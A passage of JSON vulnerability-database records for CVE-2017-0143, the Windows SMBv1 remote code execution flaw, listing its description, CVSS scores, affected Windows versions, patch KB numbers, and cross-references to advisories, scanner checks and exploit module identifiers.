["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:47456", "EDB-ID:43970", "EDB-ID:41987"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-33313", "1337DAY-ID-27752", "1337DAY-ID-33895", "1337DAY-ID-29702", "1337DAY-ID-27786"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:146236", "PACKETSTORM:156196", "PACKETSTORM:154690"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-010.NASL", "700099.PRM", "700059.PRM", "MS17-010.NASL"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "ics", "idList": ["ICSMA-18-058-02", "ICSMA-20-170-01"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}], "modified": "2021-09-16T11:28:55", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-09-16T11:28:55", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB3177186", "KB3210720", "KBMS16-110, 3187754", "KB4012214", "KB3210721", "KB4012606", "KB3213986", "KB4012213", "KB4012215", "KB3212646", "KB3205409", "KB4012212", "KB4013198", "KB4012217", "KB4012216", "KB4012598", "KB4013429", "KB3205401"], "msrc": "", "mscve": "CVE-2017-0143", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-16T11:28:55", "differentElements": ["msAffectedSoftware"], "edition": 47}, {"bulletin": {"id": "MS:CVE-2017-0143", "hash": "f7b4e50f4ef2188508dc09f5f5ce8194", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0143", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-09-16T12:44:29", "history": [], "viewCount": 9, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0143"]}, {"type": "attackerkb", "idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "symantec", "idList": ["SMNTC-96703"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "threatpost", "idList": ["THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:7D1D823549046978FD52257C68DF7801", "THREATPOST:43C3E019D454987EF522E299C31E9D3F", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:BC214880895281474C1A8EF7B7D98C13", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:47456", "EDB-ID:43970", "EDB-ID:41987"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-33895", "1337DAY-ID-33313", "1337DAY-ID-29702", "1337DAY-ID-27752", "1337DAY-ID-27786"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:146236", "PACKETSTORM:156196", "PACKETSTORM:154690"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "nessus", "idList": ["700099.PRM", "SMB_NT_MS17-010.NASL", "MS17-010.NASL", "700059.PRM"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "ics", "idList": ["ICSMA-18-058-02", "ICSMA-20-170-01"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}], "modified": "2021-09-16T12:44:29", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-09-16T12:44:29", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBMS16-110, 3187754", "KB4012606", "KB4012214", "KB3213986", "KB3212646", "KB4012212", "KB4012213", "KB3210720", "KB4013198", "KB3205401", "KB4013429", "KB3177186", "KB4012217", "KB3210721", "KB4012215", "KB4012598", "KB3205409", "KB4012216"], "msrc": "", "mscve": "CVE-2017-0143", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-16T12:44:29", "differentElements": ["msAffectedSoftware"], "edition": 48}, {"bulletin": {"id": "MS:CVE-2017-0143", "hash": "bdbcad436fc25396d6ee8890a5e6edb2", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0143", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-09-17T02:51:36", "history": [], "viewCount": 9, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0143"]}, {"type": "attackerkb", "idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "symantec", "idList": ["SMNTC-96703"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "threatpost", "idList": ["THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:7D1D823549046978FD52257C68DF7801", "THREATPOST:43C3E019D454987EF522E299C31E9D3F", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:BC214880895281474C1A8EF7B7D98C13", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:47456", "EDB-ID:43970", "EDB-ID:41987"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-33895", "1337DAY-ID-33313", "1337DAY-ID-29702", "1337DAY-ID-27752", "1337DAY-ID-27786"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:146236", "PACKETSTORM:156196", "PACKETSTORM:154690"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "nessus", "idList": ["700099.PRM", "SMB_NT_MS17-010.NASL", "MS17-010.NASL", "700059.PRM"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "ics", "idList": ["ICSMA-18-058-02", "ICSMA-20-170-01"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}], "modified": "2021-09-16T12:44:29", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-09-16T12:44:29", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4012213", "KB3210721", "KB3177186", "KB3205401", "KB4012215", "KB3210720", "KB4012216", "KB4013198", "KB4012214", "KB4013429", "KB3205409", "KB3212646", "KB4012212", "KB4012606", "KB3213986", "KBMS16-110, 3187754", "KB4012598", "KB4012217"], "msrc": "", "mscve": "CVE-2017-0143", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", 